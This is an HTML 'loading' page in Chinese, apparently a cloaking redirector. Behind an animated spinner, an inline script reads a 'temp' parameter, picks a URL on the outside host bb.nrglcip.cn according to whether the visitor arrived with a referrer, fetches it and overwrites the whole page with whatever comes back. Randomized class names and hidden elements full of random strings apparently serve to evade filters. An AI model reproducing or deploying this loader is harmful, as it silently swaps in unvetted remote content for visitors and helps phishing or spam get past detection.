<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .S74PDDIBOk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .S74PDDIBOk .ZxpOLx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .S74PDDIBOk .content {
            line-height: 50px;
            text-align: center
        }

        .S74PDDIBOk .img {
            width: 100%
        }

        .S74PDDIBOk .Fz3zFbRd {
            text-align: center
        }

        .S74PDDIBOk .Fz3zFbRd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .S74PDDIBOk .Fz3zFbRd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .S74PDDIBOk .Fz3zFbRd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .S74PDDIBOk .Fz3zFbRd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .S74PDDIBOk .Fz3zFbRd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .S74PDDIBOk .Fz3zFbRd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .S74PDDIBOk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZjV2fNB9Bsnkm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var f8g6c = ZjV2fNB9Bsnkm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ f8g6c +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ f8g6c +".html?a=share";
		}
		
        B860GtbI=url+"#"+new Date().getTime();
        B860GtbI && function() {
            $.get(B860GtbI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>FPdVO3vKs34d2SutWffMWZLhxyST</a>
<li style='display:none' >D7TCvXtH2wb5IdWoVWwxCr9iK1Qn3Xuieh5hsAvAG9xp1EBGnuaZ8EMScxsCoyATtYa8ty7Im9e</li>
<li style='display:none' >D7TCvXtH2wb5IdWoVWwxCr9iK1Qn3Xuieh5hsAvAG9xp1EBGnuaZ8EMScxsCoyATtYa8ty7Im9e</li>
<ul style='display:none' >eLOeJfneEuiWxA0UQGF0azgVlQsRm2wla3QqgWVpF2G813TxLWml0kc27Iw2YmQlwjazwb4jVHMVv5MuSXbeECd4v0gUUr</ul><div class="S74PDDIBOk">
    <div class="ZxpOLx">
        <div class="Fz3zFbRd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >gHJ98kuN8oN7KojONQ3KJ4QV79vzJgh1FLSSiByCWgmvZNyvLu2bPsHxuLhX6TSDXONJbMzJJo</b>
<b style='display:none' >gHJ98kuN8oN7KojONQ3KJ4QV79vzJgh1FLSSiByCWgmvZNyvLu2bPsHxuLhX6TSDXONJbMzJJo</b>
<ul style='display:none' >gHu79YhXtwKuenTxLP8uMvwjvt9fSVanG0oiMXYbsgcdmpzENo0mtr1iWvvZRfA3lF</ul>
<b style='display:none' >gHJ98kuN8oN7KojONQ3KJ4QV79vzJgh1FLSSiByCWgmvZNyvLu2bPsHxuLhX6TSDXONJbMzJJo</b>
<div style='display:none'>lLFPNO9AtoTOMmjCfnJ5Eajberpm2fE1</div>
<li style='display:none' >LWYO2HzsQCjkB13Ngbl9W3BXNuliotXvztDG6MKEm8y15vlZeQfVWYrCh9LB11TiBg7qqHcUrjqJMo6oBsEqJbdXrVE6</li>
<li style='display:none' >LWYO2HzsQCjkB13Ngbl9W3BXNuliotXvztDG6MKEm8y15vlZeQfVWYrCh9LB11TiBg7qqHcUrjqJMo6oBsEqJbdXrVE6</li>
<p  style='display:none'>RAHl2dQNWWQs9kqeJ2G6BOu676gQw5yhs2rhGrAFoJL</p>
<ul style='display:none' >gHu79YhXtwKuenTxLP8uMvwjvt9fSVanG0oiMXYbsgcdmpzENo0mtr1iWvvZRfA3lF</ul></body>
</html>